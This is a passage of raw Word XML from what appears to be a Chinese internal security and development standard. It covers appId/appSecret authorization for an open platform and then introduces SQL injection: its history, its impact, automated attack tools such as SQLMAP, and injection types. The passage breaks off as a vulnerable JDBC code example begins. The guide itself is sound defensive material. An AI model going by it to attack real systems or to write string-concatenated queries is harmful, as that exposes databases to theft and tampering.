        <w:t>应用访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代账所有服务，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>必须经过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>授权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>认证。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRPr="004C3EF3" w:rsidRDefault="00B671A3" w:rsidP="00B671A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>财税</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>开放平台</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对外发布</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rest</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务，需要为调用者分配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Id </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>appSecret</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>appId</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>appSecret</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于标识网络下唯一的用户身份标识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRDefault="00B671A3" w:rsidP="00B671A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开放平台与应用之间以</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议进行通讯，为了保证通信的安全性，开放平台加入签名认证机制。应用一旦创建，系统生成唯一并且不公开的</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3EF3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只有应用的拥有者和开放平台知道。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRPr="00AD58DC" w:rsidRDefault="00B671A3" w:rsidP="00B671A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>提供为第三方应用分配</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>appId</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>appSecret</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>功能，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>且提供相应配套的客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD58DC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B671A3" w:rsidRPr="00726579" w:rsidRDefault="00B671A3" w:rsidP="00726579">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00AA55FF" w:rsidP="00073AE3">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidR="00A5489B" w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00073AE3" w:rsidRPr="00C26930" w:rsidRDefault="00073AE3" w:rsidP="00073AE3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00073AE3" w:rsidP="00073AE3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005114F6" w:rsidRDefault="000568D7" w:rsidP="005114F6">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:t>威胁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005114F6" w:rsidRDefault="005114F6" w:rsidP="00B003D4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入进行攻击的历史已非常长了，有迹可循的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1998</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jeff Forristal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在黑客杂志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Phrack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上发表了有关微软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的相关文章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, Forristal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当时是安全组织</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ranin.forest.puppy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的负责人。尽管距离黑客第一次利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入发动攻击已经过去了近</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入仍然是当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞中最有杀伤力的威力漏洞之一。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其列为十大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞之首。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005114F6" w:rsidRDefault="005114F6" w:rsidP="00B003D4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入是指将非法的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句插入到提交的参数中，后端服务器未对用户提交的数据进行检查过滤，导致这些不信任的数据被数据库识别为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句进行解析并执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入实际上可以认为是代码注入的一种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它可以非法获取数据库敏感信息并且在拥有足够权限的情况下可以动态删除更新数据数据，结合其它提权手段也可以获得服务器的较高权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005114F6" w:rsidRDefault="005114F6" w:rsidP="00DD1DFA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击现在已经成为黑客最为常见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击手段之一。早期黑客需要有非常强的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的编程功底才能够发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击，但现在随着自动化测试利用工具的出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pangolin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Haviji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NBSI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebCrusier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。用户稍微点点鼠标或者输入几个常用的命令，任何非专业的安全人员也能够执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入检测与攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66FD7" w:rsidRPr="005114F6" w:rsidRDefault="00A66FD7" w:rsidP="00DD1DFA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="133917EE" wp14:editId="747A1922">
            <wp:extent cx="5274310" cy="25888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88895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C03D2" w:rsidRDefault="000568D7" w:rsidP="00035E01">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66FD7" w:rsidRDefault="00814E3F" w:rsidP="003D08F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞的代码</w:t>
      </w:r>
      <w:r w:rsidR="00A30E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D69E3" w:rsidRDefault="00A66FD7" w:rsidP="00555071">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询，并且开发人员使用了语句拼接，都会产生这种漏洞。</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Http</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求报文体中的各个位置可能都存在</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点，如请求参数、请求头</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。根据注入的语法可以分为</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>基于报错</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(Error-Based)</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注入、基于时间延迟</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(Time-Based)</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注入、基于多语句查询</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(Stack-Based)</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注入、基于联合查询</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(Union query-Based)</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的注入、基于布尔</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(Boolean-Based)</w:t>
      </w:r>
      <w:r w:rsidR="00555071" w:rsidRPr="00080E51">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>类型盲注</w:t>
      </w:r>
      <w:r w:rsidR="00555071">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="002D50AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ava(jdbc)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例：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A66FD7" w:rsidTr="00D30C12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>HttpServletRequest request, HttpServletResponse response) {</w:t>
            </w:r>
          </w:p>
